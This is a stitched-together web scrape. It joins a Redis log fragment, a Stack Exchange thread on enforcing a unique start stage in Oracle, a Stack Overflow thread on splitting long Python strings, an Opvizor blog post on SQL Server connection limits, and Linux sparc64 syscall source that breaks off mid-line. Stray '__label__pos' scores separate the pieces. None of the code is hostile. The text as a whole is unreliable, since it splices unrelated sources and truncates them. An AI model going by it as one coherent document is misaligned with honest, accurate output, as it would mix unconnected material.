22:52:53.868 # systemd supervision requested, but NOTIFY_SOCKET not found 3590:M 25 Aug 22:52:53.869 * Increased maximum number of open files to 10032 (it was originally set to 1024). Reply Got something to say? Join the discussion. Thank you for taking the time to share your thoughts with us. We appreciate your decision to leave a comment and value your contribution to the discussion. It's important to note that we moderate all comments in accordance with our comment policy to ensure a respectful and constructive conversation. Rest assured that your email address will remain private and will not be published or shared with anyone. We prioritize the privacy and security of our users.
__label__pos
0.593129
Database Administrators Stack Exchange is a question and answer site for database professionals who wish to improve their database skills and learn from others in the community. Join them; it only takes a minute: Sign up Here's how it works: 1. Anybody can ask a question 2. Anybody can answer 3. The best answers are voted up and rise to the top This business model is for a case management database. This is closely modeled on the idea of a file folder representing the phase and a sequential checklist representing the stages. A case consists of a phase that can have one or more stages. A phase can only have one stage that is "Current" or open at any one point in time. A case can only start from one type of stage but can progress to any one of a number of stages that are end types. In this business model there are many different types of phases and stages An example: you apply for a license. The process always starts with you submitting a form but can have different endings: the application is approved or rejected or sent back for more information. Edit: @Colin 't Hart asks what a phase is in relation to a case. Here is where trying to simplify a question can omit details. The complete schema structure is: - one case can have one or more phases but only one phase is open or "current" at at time. - each phase can have one or more stages but only one phase is open or "current" at a time. - there are different types of cases/phases/stages and transitions from the current unit to the next unit require adding a close date to the current and inserting a new record with an open date. An example: a production line for widgets • a production ticket initiates the creation of the case • the first phase: sourcing components is created • the first stage: contacting suppliers is created • the first stage is completed, the second stage: orders from suppliers is opened • orders stage is closed, inventory check stage is created • inventory stage is closed, sourcing components phase is closed • new phase: assembly is opened • new stage: move components to shop floor is opened • moving components stage is closed, new stage production line is opened • and so on.... Problem: • the existing table structure is flawed in that the same information (what is the first type of stage for a kind of phase) is stored in two different tables • You can have more than one entry in STAGE where IS_START_STAGE = 1 which violates a business rule • You can insert a new entry into STAGE where IS_START_STAGE = 1 and this does not match the corresponding entry in PHASE_FIRST_STAGE • the relationship should be something like constraint PHASE_FIRST_STAGE.STAGE_ID can only be in the entries in STAGE where IS_FIRST_STAGE = 1 • Is there anyway to enforce these business rules? CREATE TABLE PHASE_FIRST_STAGE ( PHASE_ID NUMBER(9) NOT NULL, --PRIMARY KEY and foreign key to PHASE STAGE_ID NUMBER(9) NOT NULL, --FOREIGN KEY to STAGE table ); ALTER TABLE PHASE_FIRST_STAGE ADD (CONSTRAINT PFS01 FOREIGN KEY (PHASE_ID) REFERENCES PHASE (ID), FOREIGN KEY (STAGE_ID) REFERENCES STAGE (ID)); COMMENT ON TABLE PHASE_FIRST_STAGE IS 'Contains the default first stages to enter when a phase is entered.'; CREATE TABLE STAGE ( ID NUMBER(9) NOT NULL, --PRIMARY KEY PHASE_ID NUMBER(9) NOT NULL, --FOREIGN KEY to PHASE DISABLED NUMBER(1) DEFAULT 0 NOT NULL, --CHECK IN (0,1) IS_START_STAGE NUMBER(1),--CHECK IN (0,1) IS_END_STAGE NUMBER(1) --CHECK IN (0,1) ); COMMENT ON TABLE STAGE IS 'Contains all the stages a phase can have. Each stage must have only one phase. '; --not shown is a similar table called PHASE with a one phase => many type of stage relationship share|improve this question      If you have to add business logic in constraints, you can use triggers to enforce the business rules – Nicolas Durand Sep 17 '13 at 6:50      I find it very difficult to understand what you're describing and how the datamodel is supposed to solve the problem. Could you separate the two: first describe purely your business -- without refering to the data model, and then describe how your data model implements it? – Colin 't Hart Sep 24 '13 at 19:03      Can you give us examples of phases? I can understand how a case (for example, a driver's license application) could go through various stages (application, rejection, approval) but how do the phases come into it? – Colin 't Hart Sep 25 '13 at 8:50 Justin Cave's answer here and Tom Kyte's pointed me to a solution using a function based index. I think this can be made even simpler with some more thought but this works now: CREATE OR REPLACE FUNCTION UNIQUE_START_STAGE ( phase_id_in IN NUMBER, stage_id_in IN NUMBER) RETURN NUMBER DETERMINISTIC IS -- PURPOSE:enforce business logic that a phase can have only one stage where -- the disabled field has a value of 0 and IS_START_STAGE has a value of 1 v_count NUMBER (9); BEGIN SELECT COUNT (s.id) INTO v_count FROM STAGE s WHERE S.IS_START_STAGE = 1 AND s.disabled = 0 AND S.PHASE_ID = phase_id_in; IF v_count = 1 THEN --return the primary key if there is only one v_count := stage_id_in; ELSIF v_count < 1 THEN v_count := NULL; END IF; RETURN v_count; END UNIQUE_START_STAGE; and then we create an index based the idea that there can only be one child stage that is enabled for a phase that is the start stage CREATE UNIQUE INDEX unique_start_stage_idx ON stage ( CASE WHEN disabled = 1 THEN NULL WHEN is_start_stage = 0 THEN NULL ELSE UNIQUE_START_STAGE (phase_id, id) END); --and add the same constraint to the other table CREATE UNIQUE INDEX unique_start_stage_idx2 ON PHASE_FIRST_STAGE ( UNIQUE_START_STAGE (phase_id, stage_id)); This solution partially solves the problem: • it enforces that there is only one entry in STAGE for each value of PHASE_ID where IS_START_STAGE =1 and DISABLED = 0 • it enforces this same uniqueness in PHASE_FIRST_STAGE • it does not enforce that an entry in STAGE is also in PHASE_FIRST_STAGE • you could replace the PHASE_FIRST_STAGE table with a view of STAGE that cleans up the last issue share|improve this answer Your Answer   discard By posting your answer, you agree to the privacy policy and terms of service. Not the answer you're looking for? Browse other questions tagged or ask your own question.
__label__pos
0.957635
Take the 2-minute tour × Stack Overflow is a question and answer site for professional and enthusiast programmers. It's 100% free, no registration required. I have a script in which a very long argument of type str is passed to a function: parser = argparse.ArgumentParser(description='Auto-segments a text based on the TANGO algorithm (Rie Kubota Ando and Lillian Lee, "Mostly-Unsupervised Statistical Segmentation of Japanese Kanji Sequences" (Natural Language Engineering, 9(2):127-149, 2003)).') I'd like to limit line length in this script to 79 chars, which means line breaking in the middle of the string in question. Simply wrapping at 79 yields something like this, which is syntactically ill-formed: parser = argparse.ArgumentParser(description="Auto-segments a text based on the TANGO algorithm (Rie Kubota Ando and Lillian Lee, 'Mostly-Unsupervis ed Statistical Segmentation of Japanese Kanji Sequences' (Natural Langua ge Engineering, 9(2):127-149, 2003)).") PEP 8 has guidelines for breaking lines in various non-argument-string-internal locations, but is there a way to break the line in the middle of an argument string? (Related but less important question: What is a sensible/conventional way to break natural language text mid-word inside a (python) script?) share|improve this question add comment 3 Answers up vote 1 down vote accepted Literal strings can appear next to each other, and will compile to a single string. Thus: parser = argparse.ArgumentParser(description="Auto-segments a text based on " "the TANGO algorithm (Rie Kubota Ando and Lillian Lee, 'Mostly-Unsupervised " "Statistical Segmentation of Japanese Kanji Sequences' (Natural Language " "Engineering, 9(2):127-149, 2003)).") Adjust as desired to fit in 80. share|improve this answer add comment >>>longarg = "ABCDEF\ GHIJKLMNOPQRSTUVW\ XYZ" >>>print longarg ABCDEFGHIJKLMNOPQRSTUVWXYZ share|improve this answer add comment argparse reformats the description string anyway, so it won't change the result if you use a multiline string with extra spaces: import argparse parser = argparse.ArgumentParser(description='''Auto-segments a text based on the TANGO algorithm (Rie Kubota Ando and Lillian Lee, "Mostly-Unsupervised Statistical Segmentation of Japanese Kanji Sequences" (Natural Language Engineering, 9(2):127-149, 2003)).''') args = parser.parse_args() % test.py -h usage: test.py [-h] Auto-segments a text based on the TANGO algorithm (Rie Kubota Ando and Lillian Lee, "Mostly-Unsupervised Statistical Segmentation of Japanese Kanji Sequences" (Natural Language Engineering, 9(2):127-149, 2003)). optional arguments: -h, --help show this help message and exit share|improve this answer add comment Your Answer   discard By posting your answer, you agree to the privacy policy and terms of service. Not the answer you're looking for? Browse other questions tagged or ask your own question.
__label__pos
0.745729
How to Handle Database Connection Limits Most databases including Microsoft SQL have a maximum open connection limit. As technology advances, the demand for uninterrupted database access will only grow. In today's technology-driven world, databases play a crucial role in storing and managing vast amounts of data. However, it is essential to be aware that most databases have a maximum open connection limit. Brown Peach Illustrative GreetingsSlogans Banner Landscape (8) When this limit is reached, it can lead to performance issues and even cause the database to become unresponsive. In this blog post, we will explore the concept of connection limits and discuss how they apply to popular databases such as Microsoft SQL, Oracle Database, MySQL, and PostgreSQL. We start with Microsoft SQL in this post. Additionally, we will outline the steps to resolve this issue without having to restart the entire database. When an application encounters the maximum connection limit of a database, it means that the database has reached its maximum capacity for accepting new connections. In this situation, the application will not be able to establish a new link to the database until an existing connection is closed or released. The specific behavior of the application, when it encounters the maximum connection limit, may vary depending on how it is programmed. Some applications may display an error message indicating that the maximum connection limit has been reached, while others may simply fail to establish a new connection without providing any specific error message. To resolve this issue, most often database administrators restart the database, which forces a recovery of all in-flight transactions and often associated errors to the ultimate web users.  This is very disruptive and leads to lower customer satisfaction. We at Opvizor are offering a much more future-looking solution. But first, let’s understand what database convection limits are.  Understanding Connection Limits A connection limit refers to the maximum number of concurrent connections that a database can handle. This limit is set by the database management system (DBMS) and is typically defined based on the hardware resources available and the configuration settings. When the number of open connections reaches the maximum limit, any new connection attempts are denied, resulting in connection failures. The Case of Microsoft SQL Microsoft SQL Server, a widely used relational database management system, also imposes connection limits. The maximum number of connections allowed depends on the edition of the SQL Server being used. You can query the current maximum by running: SELECT name, value, value_in_use, [description]  FROM sys.configurations  WHERE name = 'user connections'; To check the currently active connections by different sources you can run: By Client Machine SELECT client_net_address,  COUNT(DISTINCT session_id) AS [Number of Sessions] FROM sys.dm_exec_sessions WHERE client_net_address IS NOT NULL GROUP BY  client_net_address ORDER BY  [Number of Sessions] DESC; By Connection SELECT  c.client_net_address, s.program_name, COUNT(c.connection_id) AS [Number of Connections] FROM  sys.dm_exec_connections c JOIN  sys.dm_exec_sessions s ON c.session_id = s.session_id GROUP BY  c.client_net_address, s.program_name ORDER BY  [Number of Connections] DESC; To make it even simpler to monitor the maximum and active connections we added that information to our Microsoft SQL integration in Opvizor/Cloud. Changing the Maximum Connection Limit To change the setting to a feasible maximum value, you can run: sp_configure 'show advanced options', 1; RECONFIGURE; sp_configure 'user connections', <new_value>; RECONFIGURE; Unfortunately, that change requires an MS SQL service restart. Conclusion In conclusion, understanding and effectively managing connection limits in databases is crucial in today's data-driven landscape. As technology advances, the demand for seamless and uninterrupted database access will only grow. By exploring alternative solutions and mitigating the need for disruptive restarts, we can ensure better performance, higher customer satisfaction, and a more future-proof approach to database management. Stay tuned for more insights on this topic as we continue our blog post series, and if you haven't signed up for Opvizor/Cloud, visit https://cloud.opvizor.com/ to get your first integration running for free. Similar posts Get notified on new marketing insights Be the first to know about new B2B SaaS Marketing insights to build or refine your marketing function with the tools and knowledge of today’s industry.
__label__pos
0.749907
Upload a Rely Column to a Information Body in R You’ll be able to utility refer to unsophisticated syntax so as to add a ‘count’ column to an information body in R: df %>% group_by(var1) %>% mutate(var1_count = n()) This actual syntax provides a column known as var1_count to the information body that accommodates the rely of values within the column known as var1. Refer to instance displays how one can utility this syntax in follow. Instance: Upload Rely Column in R Think we’ve refer to information body in R that accommodates details about diverse basketball gamers: #outline information frama df <- information.body(group=c('A', 'A', 'A', 'B', 'B', 'B', 'B', 'B'), place=c('G', 'F', 'F', 'F', 'G', 'G', 'F', 'F'), issues=c(18, 22, 19, 14, 14, 11, 20, 28)) #view information body df group place issues 1 A G 18 2 A F 22 3 A F 19 4 B F 14 5 B G 14 6 B G 11 7 B F 20 8 B F 28 We will utility refer to code so as to add a column known as team_count that accommodates the rely of every group: library(dplyr) #upload column that displays general rely of every group df %>% group_by(group) %>% mutate(team_count = n()) # A tibble: 8 x 4 # Teams: group [2] group place issues team_count 1 A G 18 3 2 A F 22 3 3 A F 19 3 4 B F 14 5 5 B G 14 5 6 B G 11 5 7 B F 20 5 8 B F 28 5 There are 3 rows with a group price of A and 5 rows with a group price of B. Thus: • For every row the place the group is the same as A, the worth within the team_count column is 3. • For every row the place the group is the same as B, the worth within the team_count column is 5. You’ll be able to additionally upload a ‘count’ column that teams by way of more than one variables. As an example, refer to code displays how one can upload a ‘count’ column that teams by way of the group and place variables: library(dplyr) #upload column that displays general rely of every group and place df %>% group_by(group, place) %>% mutate(team_pos_count = n()) # A tibble: 8 x 4 # Teams: group, place [4] group place issues team_pos_count 1 A G 18 1 2 A F 22 2 3 A F 19 2 4 B F 14 3 5 B G 14 2 6 B G 11 2 7 B F 20 3 8 B F 28 3 From the output we will see: • There’s 1 row that accommodates A within the group column and G within the place column. • There are 2 rows that include A within the group column and F within the place column. • There are 3 rows that include B within the group column and F within the place column. • There are 2 rows that include B within the group column and F within the place column. Supplementary Sources Refer to tutorials provide an explanation for how one can carry out alternative regular duties in R: Staff By means of and Rely with Situation in R Rely Choice of Parts in Checklist in R Make a choice Distinctive Rows in a Information Body in R
__label__pos
0.609571
summaryrefslogtreecommitdiff path: root/arch/sparc/kernel/sys_sparc_64.c blob: cb1bef6f14b7240e3f87bb693b060fcbcb90a081 (plain) 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 386 387 388 389 390 391 392 393 394 395 396 397 398 399 400 401 402 403 404 405 406 407 408 409 410 411 412 413 414 415 416 417 418 419 420 421 422 423 424 425 426 427 428 429 430 431 432 433 434 435 436 437 438 439 440 441 442 443 444 445 446 447 448 449 450 451 452 453 454 455 456 457 458 459 460 461 462 463 464 465 466 467 468 469 470 471 472 473 474 475 476 477 478 479 480 481 482 483 484 485 486 487 488 489 490 491 492 493 494 495 496 497 498 499 500 501 502 503 504 505 506 507 508 509 510 511 512 513 514 515 516 517 518 519 520 521 522 523 524 525 526 527 528 529 530 531 532 533 534 535 536 537 538 539 540 541 542 543 544 545 546 547 548 549 550 551 552 553 554 555 556 557 558 559 560 561 562 563 564 565 566 567 568 569 570 571 572 573 574 575 576 577 578 579 580 581 582 583 584 585 586 587 588 589 590 591 592 593 594 595 596 597 598 599 600 601 602 603 604 605 606 607 608 609 610 611 612 613 614 615 616 617 618 619 620 621 622 623 624 625 626 627 628 629 630 631 632 633 634 635 636 637 638 639 640 641 642 643 644 645 646 647 648 649 650 651 652 653 654 655 656 657 658 659 660 661 662 663 664 665 666 667 668 669 670 671 672 673 674 675 676 677 678 679 680 681 682 683 684 685 686 687 688 689 690 691 692 693 694 695 696 697 698 699 700 701 702 703 704 705 706 707 708 709 710 711 712 713 714 715 716 717 718 719 720 721 722 723 724 725 726 727 728 729 730 731 732 733 734 735 736 737 738 739 740 741 742 743 744 745 746 747 748 749 750 751 752 753 754 755 756 757 758 759 760 761 762 763 764 765 766 767 768 769 770 771 772 773 774 775 776 777 778 779 780 781 782 783 784 785 786 /* linux/arch/sparc64/kernel/sys_sparc.c * * This file contains various random system calls that * have a non-standard calling sequence on the Linux/sparc * platform. */ #include <linux/errno.h> #include <linux/types.h> #include <linux/sched.h> #include <linux/fs.h> #include <linux/file.h> #include <linux/mm.h> #include <linux/sem.h> #include <linux/msg.h> #include <linux/shm.h> #include <linux/stat.h> #include <linux/mman.h> #include <linux/utsname.h> #include <linux/smp.h> #include <linux/slab.h> #include <linux/syscalls.h> #include <linux/ipc.h> #include <linux/personality.h> #include <linux/random.h> #include <linux/module.h> #include <asm/uaccess.h> #include <asm/utrap.h> #include <asm/unistd.h> #include "entry.h" #include "systbls.h" /* #define DEBUG_UNIMP_SYSCALL */ asmlinkage unsigned long sys_getpagesize(void) { return PAGE_SIZE; } #define VA_EXCLUDE_START (0x0000080000000000UL - (1UL << 32UL)) #define VA_EXCLUDE_END (0xfffff80000000000UL + (1UL << 32UL)) /* Does addr --> addr+len fall within 4GB of the VA-space hole or * overflow past the end of the 64-bit address space? */ static inline int invalid_64bit_range(unsigned long addr, unsigned long len) { unsigned long va_exclude_start, va_exclude_end; va_exclude_start = VA_EXCLUDE_START; va_exclude_end = VA_EXCLUDE_END; if (unlikely(len >= va_exclude_start)) return 1; if (unlikely((addr + len) < addr)) return 1; if (unlikely((addr >= va_exclude_start && addr < va_exclude_end) || ((addr + len) >= va_exclude_start && (addr + len) < va_exclude_end))) return 1; return 0; } /* Does start,end straddle the VA-space hole? */ static inline int straddles_64bit_va_hole(unsigned long start, unsigned long end) { unsigned long va_exclude_start, va_exclude_end; va_exclude_start = VA_EXCLUDE_START; va_exclude_end = VA_EXCLUDE_END; if (likely(start < va_exclude_start && end < va_exclude_start)) return 0; if (likely(start >= va_exclude_end && end >= va_exclude_end)) return 0; return 1; } /* These functions differ from the default implementations in * mm/mmap.c in two ways: * * 1) For file backed MAP_SHARED mmap()'s we D-cache color align, * for fixed such mappings we just validate what the user gave us. * 2) For 64-bit tasks we avoid mapping anything within 4GB of * the spitfire/niagara VA-hole. */ static inline unsigned long COLOUR_ALIGN(unsigned long addr, unsigned long pgoff) { unsigned long base = (addr+SHMLBA-1)&~(SHMLBA-1); unsigned long off = (pgoff<<PAGE_SHIFT) & (SHMLBA-1); return base + off; } static inline unsigned long COLOUR_ALIGN_DOWN(unsigned long addr, unsigned long pgoff) { unsigned long base = addr & ~(SHMLBA-1); unsigned long off = (pgoff<<PAGE_SHIFT) & (SHMLBA-1); if (base + off <= addr) return base + off; return base - off; } unsigned long arch_get_unmapped_area(struct file *filp, unsigned long addr, unsigned long len, unsigned long pgoff, unsigned long flags) { struct mm_struct *mm = current->mm; struct vm_area_struct * vma; unsigned long task_size = TASK_SIZE; unsigned long start_addr; int do_color_align; if (flags & MAP_FIXED) { /* We do not accept a shared mapping if it would violate * cache aliasing constraints. */ if ((flags & MAP_SHARED) && ((addr - (pgoff << PAGE_SHIFT)) & (SHMLBA - 1))) return -EINVAL; return addr; } if (test_thread_flag(TIF_32BIT)) task_size = STACK_TOP32; if (unlikely(len > task_size || len >= VA_EXCLUDE_START)) return -ENOMEM; do_color_align = 0; if (filp || (flags & MAP_SHARED)) do_color_align = 1; if (addr) { if (do_color_align) addr = COLOUR_ALIGN(addr, pgoff); else addr = PAGE_ALIGN(addr); vma = find_vma(mm, addr); if (task_size - len >= addr && (!vma || addr + len <= vma->vm_start)) return addr; } if (len > mm->cached_hole_size) { start_addr = addr = mm->free_area_cache; } else { start_addr = addr = TASK_UNMAPPED_BASE; mm->cached_hole_size = 0; } task_size -= len; full_search: if (do_color_align) addr = COLOUR_ALIGN(addr, pgoff); else addr = PAGE_ALIGN(addr); for (vma = find_vma(mm, addr); ; vma = vma->vm_next) { /* At this point: (!vma || addr < vma->vm_end). */ if (addr < VA_EXCLUDE_START && (addr + len) >= VA_EXCLUDE_START) { addr = VA_EXCLUDE_END; vma = find_vma(mm, VA_EXCLUDE_END); } if (unlikely(task_size < addr)) { if (start_addr != TASK_UNMAPPED_BASE) { start_addr = addr = TASK_UNMAPPED_BASE; mm->cached_hole_size = 0; goto full_search; } return -ENOMEM; } if (likely(!vma || addr + len <= vma->vm_start)) { /* * Remember the place where we stopped the search: */ mm->free_area_cache = addr + len; return addr; } if (addr + mm->cached_hole_size < vma->vm_start) mm->cached_hole_size = vma->vm_start - addr; addr = vma->vm_end; if (do_color_align) addr = COLOUR_ALIGN(addr, pgoff); } } unsigned long arch_get_unmapped_area_topdown(struct file *filp, const unsigned long addr0, const unsigned long len, const unsigned long pgoff, const unsigned long flags) { struct vm_area_struct *vma; struct mm_struct *mm = current->mm; unsigned long task_size = STACK_TOP32; unsigned long addr = addr0; int do_color_align; /* This should only ever run for 32-bit processes. */ BUG_ON(!test_thread_flag(TIF_32BIT)); if (flags & MAP_FIXED) { /* We do not accept a shared mapping if it would violate * cache aliasing constraints. */ if ((flags & MAP_SHARED) && ((addr - (pgoff << PAGE_SHIFT)) & (SHMLBA - 1))) return -EINVAL; return addr; } if (unlikely(len > task_size)) return -ENOMEM; do_color_align = 0; if (filp || (flags & MAP_SHARED)) do_color_align = 1; /* requesting a specific address */ if (addr) { if (do_color_align) addr = COLOUR_ALIGN(addr, pgoff); else addr = PAGE_ALIGN(addr); vma = find_vma(mm, addr); if (task_size - len >= addr && (!vma || addr + len <= vma->vm_start)) return addr; } /* check if free_area_cache is useful for us */ if (len <= mm->cached_hole_size) { mm->cached_hole_size = 0; mm->free_area_cache = mm->mmap_base; } /* either no address requested or can't fit in requested address hole */ addr = mm->free_area_cache; if (do_color_align) { unsigned long base = COLOUR_ALIGN_DOWN(addr-len, pgoff); addr = base + len; } /* make sure it can fit in the remaining address space */ if (likely(addr > len)) { vma = find_vma(mm, addr-len); if (!vma || addr <= vma->vm_start) { /* remember the address as a hint for next time */ return (mm->free_area_cache = addr-len); } } if (unlikely(mm->mmap_base < len)) goto bottomup; addr = mm->mmap_base-len; if (do_color_align) addr = COLOUR_ALIGN_DOWN(addr, pgoff); do { /* * Lookup failure means no vma is above this address, * else if new region fits below vma->vm_start, * return with success: */ vma = find_vma(mm, addr); if (likely(!vma || addr+len <= vma->vm_start)) { /* remember the address as a hint for next time */ return (mm->free_area_cache = addr); } /* remember the largest hole we saw so far */ if (addr + mm->cached_hole_size < vma->vm_start) mm->cached_hole_size = vma->vm_start - addr; /* try just below the current vma->vm_start */ addr = vma->vm_start-len; if (do_color_align) addr = COLOUR_ALIGN_DOWN(addr, pgoff); } while (likely(len < vma->vm_start)); bottomup: /* * A failed mmap() very likely causes application failure, * so fall back to the bottom-up function here. This scenario * can happen with large stack limits and large mmap() * allocations. */ mm->cached_hole_size = ~0UL; mm->free_area_cache = TASK_UNMAPPED_BASE; addr = arch_get_unmapped_area(filp, addr0, len, pgoff, flags); /* * Restore the topdown base: */ mm->free_area_cache = mm->mmap_base; mm->cached_hole_size = ~0UL; return addr; } /* Try to align mapping such that we align it as much as possible. */ unsigned long get_fb_unmapped_area(struct file *filp, unsigned long orig_addr, unsigned long len, unsigned long pgoff, unsigned long flags) { unsigned long align_goal, addr = -ENOMEM; unsigned long (*get_area)(struct file *, unsigned long, unsigned long, unsigned long, unsigned long); get_area = current->mm->get_unmapped_area; if (flags & MAP_FIXED) { /* Ok, don't mess with it. */ return get_area(NULL, orig_addr, len, pgoff, flags); } flags &= ~MAP_SHARED; align_goal = PAGE_SIZE; if (len >= (4UL * 1024 * 1024)) align_goal = (4UL * 1024 * 1024); else if (len >= (512UL * 1024)) align_goal = (512UL * 1024); else if (len >= (64UL * 1024)) align_goal = (64UL * 1024); do { addr = get_area(NULL, orig_addr, len + (align_goal - PAGE_SIZE), pgoff, flags); if (!(addr & ~PAGE_MASK)) { addr = (addr + (align_goal - 1UL)) & ~(align_goal - 1UL); break; } if (align_goal == (4UL * 1024 * 1024)) align_goal = (512UL * 1024); else if (align_goal == (512UL * 1024)) align_goal = (64UL * 1024); else align_goal = PAGE_SIZE; } while ((addr & ~PAGE_MASK) && align_goal > PAGE_SIZE); /* Mapping is smaller than 64K or larger areas could not * be obtained. */ if (addr & ~PAGE_MASK) addr = get_area(NULL, orig_addr, len, pgoff, flags); return addr; } EXPORT_SYMBOL(get_fb_unmapped_area); /* Essentially the same as PowerPC... */ void arch_pick_mmap_layout(struct mm_struct *mm) { unsigned long random_factor = 0UL; unsigned long gap; if (current->flags & PF_RANDOMIZE) { random_factor = get_random_int(); if (test_thread_flag(TIF_32BIT)) random_factor &= ((1 * 1024 * 1024) - 1); else random_factor = ((random_factor << PAGE_SHIFT) & 0xffffffffUL); } /* * Fall back to the standard layout if the personality * bit is set, or if the expected stack growth is unlimited: */ gap = rlimit(RLIMIT_STACK); if (!test_thread_flag(TIF_32BIT) || (current->personality & ADDR_COMPAT_LAYOUT) || gap == RLIM_INFINITY || sysctl_legacy_va_layout) { mm->mmap_base = TASK_UNMAPPED_BASE + random_factor; mm->get_unmapped_area = arch_get_unmapped_area; mm->unmap_area = arch_unmap_area; } else { /* We know it's 32-bit */ unsigned long task_size = STACK_TOP32; if (gap < 128 * 1024 * 1024) gap = 128 * 1024 * 1024; if (gap > (task_size / 6 * 5)) gap = (task_size / 6 * 5); mm->mmap_base = PAGE_ALIGN(task_size - gap - random_factor); mm->get_unmapped_area = arch_get_unmapped_area_topdown; mm->unmap_area = arch_unmap_area_topdown; } } /* * sys_pipe() is the normal C calling standard for creating * a pipe. It's not the way unix traditionally does this, though. */ SYSCALL_DEFINE1(sparc_pipe_real, struct pt_regs *, regs) { int fd[2]; int error; error = do_pipe_flags(fd, 0); if (error) goto out; regs->u_regs[UREG_I1] = fd[1]; error = fd[0]; out: return error; } /* * sys_ipc() is the de-multiplexer for the SysV IPC calls.. * * This is really horribly ugly. */ SYSCALL_DEFINE6(ipc, unsigned int, call, int, first, unsigned long, second, unsigned long, third, void __user *, ptr, long, fifth) { long err; /* No need for backward compatibility. We can start fresh... */ if (call <= SEMCTL) { switch (call) { case SEMOP: err = sys_semtimedop(first, ptr, (unsigned)second, NULL); goto out; case SEMTIMEDOP: err = sys_semtimedop(first, ptr, (unsigned)second, (const struct timespec __user *) (unsigned long) fifth); goto out; case SEMGET: err = sys_semget(first, (int)second, (int)third); goto out; case SEMCTL: { err = sys_semctl(first, second, (int)third | IPC_64, (union semun) ptr); goto out; } default: err = -ENOSYS; goto out; }; } if (call <= MSGCTL) { switch (call) { case MSGSND: err = sys_msgsnd(first, ptr, (size_t)second, (int)third); goto out; case MSGRCV: err = sys_msgrcv(first, ptr, (size_t)second, fifth, (int)third); goto out; case MSGGET: err = sys_msgget((key_t)first, (int)second); goto out; case MSGCTL: err = sys_msgctl(first, (int)second | IPC_64, ptr); goto out; default: err = -ENOSYS; goto out; }; } if (call <= SHMCTL) { switch (call) { case SHMAT: { ulong raddr; err = do_shmat(first, ptr, (int)second, &raddr); if (!err) { if (put_user(raddr, (ulong __user *) third)) err = -EFAULT; } goto out; } case SHMDT: err = sys_shmdt(ptr); goto out; case SHMGET: err = sys_shmget(first, (size_t)second, (int)third); goto out; case SHMCTL: err = sys_shmctl(first, (int)second | IPC_64, ptr); goto out; default: err = -ENOSYS; goto out; }; } else { err = -ENOSYS; } out: return err; } SYSCALL_DEFINE1(sparc64_newuname, struct new_utsname __user *, name) { int ret = sys_newuname(name); if (current->personality == PER_LINUX32 && !ret) { ret = (copy_to_user(name->machine, "sparc\0\0", 8) ? -EFAULT : 0); } return ret; } SYSCALL_DEFINE1(sparc64_personality, unsigned long, personality) { int ret; if (current->personality == PER_LINUX32 && personality == PER_LINUX) personality = PER_LINUX32; ret = sys_personality(personality); if (ret == PER_LINUX32) ret = PER_LINUX; return ret; } int sparc_mmap_check(unsigned long addr, unsigned long len) { if (test_thread_flag(TIF_32BIT)) { if (len >= STACK_TOP32) return -EINVAL; if (addr > STACK_TOP32 - len) return -EINVAL; } else { if (len >= VA_EXCLUDE_START) return -EINVAL; if (invalid_64bit_range(addr, len)) return -EINVAL; } return 0; } /* Linux version of mmap */ SYSCALL_DEFINE6(mmap, unsigned long, addr, unsigned long, len, unsigned long, prot, unsigned long, flags, unsigned long, fd, unsigned long, off) { unsigned long retval = -EINVAL; if ((off + PAGE_ALIGN(len)) < off) goto out; if (off & ~PAGE_MASK) goto out; retval = sys_mmap_pgoff(addr, len, prot, flags, fd, off >> PAGE_SHIFT); out: return retval; } SYSCALL_DEFINE2(64_munmap, unsigned long, addr, size_t, len) { long ret; if (invalid_64bit_range(addr, len)) return -EINVAL; down_write(&current->mm->mmap_sem); ret = do_munmap(current->mm, addr, len); up_write(&current->mm->mmap_sem); return ret; } extern unsigned long do_mremap(unsigned long addr, unsigned long old_len, unsigned long new_len, unsigned long flags, unsigned long new_addr); SYSCALL_DEFINE5(64_mremap, unsigned long, addr, unsigned long, old_len, unsigned long, new_len, unsigned long, flags, unsigned long, new_addr) { unsigned long ret = -EINVAL; if (test_thread_flag(TIF_32BIT)) goto out; down_write(&current->mm->mmap_sem); ret = do_mremap(addr, old_len, new_len, flags, new_addr); up_write(&current->mm->mmap_sem); out: return ret; } /* we come to here via sys_nis_syscall so it can setup the regs argument */ asmlinkage unsigned long c_sys_nis_syscall(struct pt_regs *regs) { static int count; /* Don't make the system unusable, if someone goes stuck */ if (count++ > 5) return -ENOSYS; printk ("Unimplemented SPARC system call %ld\n",regs->u_regs[1]); #ifdef DEBUG_UNIMP_SYSCALL show_regs (regs); #endif return -ENOSYS; } /* #define DEBUG_SPARC_BREAKPOINT */ asmlinkage void sparc_breakpoint(struct pt_regs *regs) { siginfo_t info; if (test_thread_flag(TIF_32BIT)) { regs->tpc &= 0xffffffff; regs->tnpc &= 0xffffffff; } #ifdef DEBUG_SPARC_BREAKPOINT printk ("TRAP: Entering kernel PC=%lx, nPC=%lx\n", regs->tpc, regs->tnpc); #endif info.si_signo = SIGTRAP; info.si_errno = 0; info.si_code = TRAP_BRKPT; info.si_addr = (void __user *)regs->tpc; info.si_trapno = 0; force_sig_info(SIGTRAP, &info, current); #ifdef DEBUG_SPARC_BREAKPOINT printk ("TRAP: Returning to space: 